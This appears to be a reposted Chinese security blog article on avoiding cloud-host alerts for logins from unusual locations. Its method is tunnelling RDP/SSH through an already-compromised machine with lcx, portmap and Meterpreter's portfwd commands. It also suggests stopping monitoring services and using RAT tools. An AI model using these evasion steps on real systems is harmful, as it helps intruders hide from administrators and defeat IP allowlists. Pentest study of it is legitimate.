云主机RDP/SSH异地登陆提醒绕过

2021年9月4日07:05:56评论119 views字数 1303阅读4分20秒阅读模式

声明：该公众号大部分文章来自作者日常学习笔记，也有少部分文章是经过原作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。

请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

最近这段时间由于当本疫情、工作和暑期等原因比较浮躁，难以静不下心来写东西，下班回家就躺尸刷视频，没了当初的动力，感觉自己快废了。云主机RDP/SSH异地登陆提醒绕过

周末还是抽空找了篇库存分享给大家，希望大家从中能有所收获。云主机RDP/SSH异地登陆提醒绕过

0x01 前言

国内几大云主机服务商都为客户提供了RDP/SSH异地登录提醒云监控功能，如：阿里、腾讯、百度、华为等，它能够有效的帮助服务器管理员快速确定是否被黑客恶意入侵，并且详细记录了异地登录者的登录区域和IP地址等信息，推送信息方式一般为云平台、语音、短信、邮件。

但如果我们作为一名渗透测试工作者在渗透某目标时通过前期的信息搜集确定为某云主机，即使成功拿到这台主机的权限也不建议直接去连接它的RDP/SSH，因为这样极易被服务器管理员发现，而且他们会收到云主机平台推送的安全告警信息，得不偿失。

0x02 绕过异地登录提醒

这里以Portfwd和Lcx绕过腾讯云主机的异地登录提醒为例来做演示，其实就是通过当前已控制主机的流量来连接它的RDP/SSH。

lcx.exe -listen 13389 23389./portmap -m 2 -p1 13899 -h2 127.0.0.1 -p2 23389

lcx.exe -slave 39.**.*.238 13899 127.0.0.1 3389

meterpreter > portfwd add -r 127.0.0.1 -p 3389 -l 13389

‍

这样的好处就是在连接腾讯云主机RDP时的IP地址是127.0.0.1，所以不会触发异地登录提醒，这点可以在Windows安全日志或netstat -ano命令中看出。

0x03 绕过WAF黑白名单IP限制

大家都知道portfwd是MSF下的端口转发命令，但可能并没有发现最终连接IP的这个问题，在使用portfwd进行端口转发时可在一定程度上隐藏我们的真实连接IP地址，而且在特定情况下也能绕过WAF防护软件中的远程登录防护“黑白名单IP认证”限制，见下图。

笔者这里另外提供几个绕过思路，但仅可作为参考，并没有都去实践，不保证其可行性！！！

1) 端口转发、Socks4/5代理和隧道等技术；2) RAT远控、AnyDesk、TeamViewer等工具；3) 结束或停止某云主机上的监控相关进程和服务；

0x04 题外话

可能有的人会说，这不就是一个简单的LCX端口转发吗？没错，的确如此，但又有多少人发现这能绕过云主机异地登陆提醒和WAF的黑白名单IP认证限制？所以请...... 云主机RDP/SSH异地登陆提醒绕过

关注公众号回复“9527”可免费获取一套HTB靶场文档和视频，“1120”安全参考等安全杂志PDF电子版，“1208”个人常用高效爆破字典，“0221”2020年酒仙桥文章打包，还在等什么？赶紧点击下方名片关注学习吧！

推荐阅读

欢迎私下骚扰

本文始发于微信公众号（潇湘信安）：云主机RDP/SSH异地登陆提醒绕过

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

对抗性机器学习-攻击和缓解的分类和术语（三）